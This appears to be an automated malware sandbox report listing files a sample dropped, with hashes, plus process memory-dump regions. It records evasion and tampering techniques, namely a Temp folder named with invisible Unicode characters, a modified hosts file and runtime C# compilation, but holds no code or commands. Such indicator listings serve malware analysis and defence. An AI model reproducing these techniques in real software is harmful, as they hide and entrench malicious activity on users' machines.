34c50c2cfdf033010f7cc9deeb981741

SHA1
4c890a820a61e5d47a578f47fd7f9ec0261ec649

SHA256
a3358dd8ca5890e5bfcded472a9f8dea0b658716303e1ce645f8a819939b84b0

SHA512
bd136b2b4ef0160bd1f1265834a4030485d4d3335efe7bf0a036b1785dacd2145c8d42baa831b435d84fa4c6782570c38ba014335179a76a204aedef58f536d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‍ \Common Files\Documents\StopMount.xlsx

Filesize
513KB

MD5
8e28502d5a9bcdedac9e4b3b54845d37

SHA1
11f5b257a3d1086ba9ae3a25d4f07ff07819a379

SHA256
2035f8a7fe46fb1fcf8db3a357914c1c3031bd757c76eb6ec36a8b8349876702

SHA512
f9937af0622369b19136edc35ad8d30dbd88fe947b55e8b13a94c9921c8818fdf3d8d2ea0245fecbd737ebc1de043850ffe691dd43bdfc4f28162c9a2273503d

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‍ \Common Files\Documents\TraceMerge.csv

Filesize
387KB

MD5
76ab8440ecfdf0c18311b08347d7cd87

SHA1
12ade21da061b1f4fe2b5fbd83eea95e9e2d858d

SHA256
f32577f1e2cf355ecdc18c94d7f413d9eebd764c51f34ef4c88addc9b4fe2600

SHA512
3ab2b5ac9be2f78463385b70605cc110a01e53f35addb242b19b69cc46bc3c2f7420fe7f9c92c8e1f992a6f7f20f2f80ba24bf7e78309c76d2f40d25e7c44616

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‍ \Common Files\Documents\UnblockUnregister.xlsx

Filesize
9KB

MD5
b2939cc53f1e3dce3188ea7de9ea5ed4

SHA1
bd4e63d1b8b78e490a3a3af3002eb81aff210367

SHA256
c2f83629d33801ff3aba2288fe4d1d8f142899dfff9e389c1df636cd5a287fbd

SHA512
4970456409b2a91c0bcf4045e635193831a2fc15bf768b0601ff2ee3224894e0f4a7391ab50fd905ecec184853f27a105f5e7b4fe173990114c63e53e456167f

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fzrplpr0\CSC1CE1D9DF1E58431FA129996EF49499A7.TMP

Filesize
652B

MD5
2d00d1831770755fae5866adc1821cf4

SHA1
6398a8ea67e93e122160265bd1f4767cd5d90ea8

SHA256
e7b062ec81dc572ac8b9ff6a5dcf3b650664ced01bc605cc147e28e9d2365952

SHA512
419d2696b8b1514a44e08335a299013fcc5da1bb00caf559062e60c8444df3ba12254c402edb1866cd4095981aa375951bbf0072d0518c5397154c5283440653

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fzrplpr0\fzrplpr0.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fzrplpr0\fzrplpr0.cmdline

Filesize
607B

MD5
6916011fe3195a717b1438021b2d0ac9

SHA1
81805f210217f0d9742be4532f61e2d950a14c9c

SHA256
3ea9b0171608d7a73405145aef6c917cef9d2651d9a7eb519f95b51b701ae6d8

SHA512
78e3890a4c5802bcdd446d23964bdb926943502c14aca7b455a8cef4bf0845a3293d1bc74a0f905fa274114c87c8ea2cc18443bb30c1a28c82053a3310d6b6fe

Download Submit
memory/2580-224-0x000002F4769D0000-0x000002F4769D8000-memory.dmp

Filesize
32KB

Download
memory/3300-60-0x00007FFE64130000-0x00007FFE642A7000-memory.dmp

Filesize
1.5MB

Download
memory/3300-48-0x00007FFE6C3E0000-0x00007FFE6C3EF000-memory.dmp

Filesize
60KB

Download
memory/3300-69-0x00007FFE55800000-0x00007FFE55DE9000-memory.dmp

Filesize
5.9MB

Download
memory/3300-111-0x00007FFE65660000-0x00007FFE65679000-memory.dmp

Filesize
100KB

Download
memory/3300-112-0x00007FFE649D0000-0x00007FFE64A03000-memory.dmp

Filesize
204KB

Download
memory/3300-113-0x00007FFE64900000-0x00007FFE649CD000-memory.dmp

Filesize
820KB

Download
memory/3300-164-0x00007FFE547E0000-0x00007FFE54D00000-memory.dmp

Filesize
5.1MB

Download
memory/3300-165-0x000001E699650000-0x000001E699B70000-memory.dmp

Filesize
5.1MB

Download
memory/3300-336-0x00007FFE55800000-0x00007FFE55DE9000-memory.dmp

Filesize
5.9MB

Download
memory/3300-337-0x00007FFE68780000-0x00007FFE687A3000-memory.dmp

Filesize
140KB

Download
memory/3300-94-0x00007FFE64130000-0x00007FFE642A7000-memory.dmp

Filesize
1.5MB

Download
memory/3300-212-0x00007FFE64900000-0x00007FFE649CD000-memory.dmp

Filesize
820KB

Download
memory/3300-202-0x00007FFE55800000-0x00007FFE55DE9000-memory.dmp

Filesize
5.9MB

Download
memory/3300-211-0x00007FFE649D0000-0x00007FFE64A03000-memory.dmp

Filesize
204KB

Download
memory/3300-203-0x00007FFE68780000-0x00007FFE687A3000-memory.dmp

Filesize
140KB

Download
memory/3300-338-0x00007FFE6C3E0000-0x00007FFE6C3EF000-memory.dmp

Filesize
60KB

Download
memory/3300-66-0x00007FFE649D0000-0x00007FFE64A03000-memory.dmp

Filesize
204KB

Download
memory/3300-74-0x000001E699650000-0x000001E699B70000-memory.dmp

Filesize
5.1MB

Download
memory/3300-64-0x00007FFE66A50000-0x00007FFE66A5D000-memory.dmp

Filesize
52KB

Download
memory/3300-62-0x00007FFE65660000-0x00007FFE65679000-memory.dmp

Filesize
100KB

Download
memory/3300-73-0x00007FFE68780000-0x00007FFE687A3000-memory.dmp

Filesize
140KB

Download
memory/3300-58-0x00007FFE60A50000-0x00007FFE60A73000-memory.dmp

Filesize
140KB

Download
memory/3300-56-0x00007FFE632B0000-0x00007FFE632C9000-memory.dmp

Filesize
100KB

Download
memory/3300-54-0x00007FFE60AE0000-0x00007FFE60B0D000-memory.dmp

Filesize
180KB

Download
memory/3300-47-0x00007FFE68780000-0x00007FFE687A3000-memory.dmp

Filesize
140KB

Download
memory/3300-72-0x00007FFE547E0000-0x00007FFE54D00000-memory.dmp

Filesize
5.1MB

Download
memory/3300-25-0x00007FFE55800000-0x00007FFE55DE9000-memory.dmp

Filesize
5.9MB

Download
memory/3300-339-0x00007FFE60AE0000-0x00007FFE60B0D000-memory.dmp

Filesize
180KB

Download
memory/3300-340-0x00007FFE632B0000-0x00007FFE632C9000-memory.dmp

Filesize
100KB

Download
memory/3300-81-0x00007FFE60A50000-0x00007FFE60A73000-memory.dmp

Filesize
140KB

Download
memory/3300-76-0x00007FFE64110000-0x00007FFE64124000-memory.dmp

Filesize
80KB

Download
memory/3300-78-0x00007FFE66A00000-0x00007FFE66A0D000-memory.dmp

Filesize
52KB

Download
memory/3300-80-0x00007FFE546C0000-0x00007FFE547DC000-memory.dmp

Filesize
1.1MB

Download
memory/3300-71-0x00007FFE64900000-0x00007FFE649CD000-memory.dmp

Filesize
820KB

Download
memory/3300-322-0x00007FFE68780000-0x00007FFE687A3000-memory.dmp

Filesize
140KB

Download
memory/3300-327-0x00007FFE64130000-0x00007FFE642A7000-memory.dmp

Filesize
1.5MB

Download
memory/3300-321-0x00007FFE55800000-0x00007FFE55DE9000-memory.dmp

Filesize
5.9MB

Download
memory/3300-342-0x00007FFE64130000-0x00007FFE642A7000-memory.dmp

Filesize
1.5MB

Download
memory/3300-341-0x00007FFE60A50000-0x00007FFE60A73000-memory.dmp

Filesize
140KB

Download
memory/3300-354-0x00007FFE649D0000-0x00007FFE64A03000-memory.dmp

Filesize
204KB

Download
memory/3300-353-0x00007FFE66A50000-0x00007FFE66A5D000-memory.dmp

Filesize
52KB

Download
memory/3300-352-0x00007FFE65660000-0x00007FFE65679000-memory.dmp

Filesize
100KB

Download
memory/3300-351-0x00007FFE547E0000-0x00007FFE54D00000-memory.dmp

Filesize
5.1MB

Download
memory/3300-350-0x00007FFE546C0000-0x00007FFE547DC000-memory.dmp

Filesize
1.1MB

Download
memory/3300-349-0x00007FFE66A00000-0x00007FFE66A0D000-memory.dmp

Filesize
52KB

Download
memory/3300-348-0x00007FFE64110000-0x00007FFE64124000-memory.dmp

Filesize
80KB

Download
memory/3300-346-0x00007FFE64900000-0x00007FFE649CD000-memory.dmp

Filesize
820KB

Download
memory/4368-82-0x00007FFE53AD3000-0x00007FFE53AD5000-memory.dmp

Filesize
8KB

Download
memory/4368-83-0x000001EA69DF0000-0x000001EA69E12000-memory.dmp

Filesize
136KB

Download
memory/4368-93-0x00007FFE53AD0000-0x00007FFE54591000-memory.dmp

Filesize
10.8MB

Download
memory/4368-95-0x00007FFE53AD0000-0x00007FFE54591000-memory.dmp

Filesize
10.8MB

Download
memory/4368-107-0x00007FFE53AD0000-0x00007FFE54591000-memory.dmp

Filesize
10.8MB

Download